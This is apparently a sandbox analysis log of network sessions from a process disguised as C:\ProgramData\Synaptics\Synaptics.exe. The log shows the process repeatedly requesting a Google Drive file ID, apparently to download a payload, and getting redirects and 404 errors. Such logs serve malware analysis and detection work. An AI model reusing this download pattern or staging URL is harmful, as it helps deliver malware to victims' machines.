                                                                                                            2024-11-15 10:24:51 UTC133INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title
                                                                                                            2024-11-15 10:24:51 UTC1378INData Raw: 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 6f 31 47 55 66 33 63 6f 51 75 57 33 47 62 67 39 46 61 41 66 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74
                                                                                                            Data Ascii: >Error 404 (Not Found)!!1</title><style nonce="mo1GUf3coQuW3Gbg9FaAfA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height
                                                                                                            2024-11-15 10:24:51 UTC141INData Raw: 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: an></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            70192.168.2.1649825142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:51 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:51 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:51 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-59IfMcau9Be0fyHtj4Z04w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            71192.168.2.1649830142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:52 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:52 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:52 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-TQFYXui0kolPxSfgfIP92w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            72192.168.2.1649831142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:52 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:52 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:52 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-egr-WnLRx5AlmrezpJyJHQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            73192.168.2.1649832142.250.185.654436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:52 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:52 UTC1253INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:52 GMT
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-j5OKsjH9Kz7eZOLQWytnRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AHmUCY19QKT9CqoHQA0iFf9UiWY6F8U_9px8BI18Hf7_xfJp20V3zqqr04gkGHrvnKS0rVFHkqDiN8PzKg
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:24:52 UTC125INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width
                                                                                                            2024-11-15 10:24:52 UTC1378INData Raw: 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 7a 6b 44 43 76 58 41 52 39 4f 32 53 6d 58 71 47 4e 39 48 62 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69
                                                                                                            Data Ascii: "><title>Error 404 (Not Found)!!1</title><style nonce="UzkDCvXAR9O2SmXqGN9Hbg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;mi
                                                                                                            2024-11-15 10:24:52 UTC149INData Raw: 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            74192.168.2.1649833142.250.185.654436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:52 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            75192.168.2.1649840142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:53 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:54 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:53 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-YJlVvdbYNLI68EFWzAVmMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            76192.168.2.1649841142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:53 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:54 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:53 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-o9b4ikMSBT0F3nTIdVQO4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            77192.168.2.1649838142.250.185.654436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:53 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:54 UTC1253INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:54 GMT
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-nhbmjDzFrDeMuU3TohqEUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AFiumC70rmNBiR7HW2SdocN52PqLfAlSsPnxEL3xZisCwhpeomv3BQ_R0RqGTY1wG5pWTb7xI4U4YAbgKw
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:24:54 UTC125INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width
                                                                                                            2024-11-15 10:24:54 UTC1378INData Raw: 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 2d 68 4b 37 56 5f 6d 65 56 55 63 31 56 2d 5f 5a 45 44 54 6c 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69
                                                                                                            Data Ascii: "><title>Error 404 (Not Found)!!1</title><style nonce="t-hK7V_meVUc1V-_ZEDTlg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;mi
                                                                                                            2024-11-15 10:24:54 UTC149INData Raw: 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            78192.168.2.1649839142.250.185.654436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:53 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
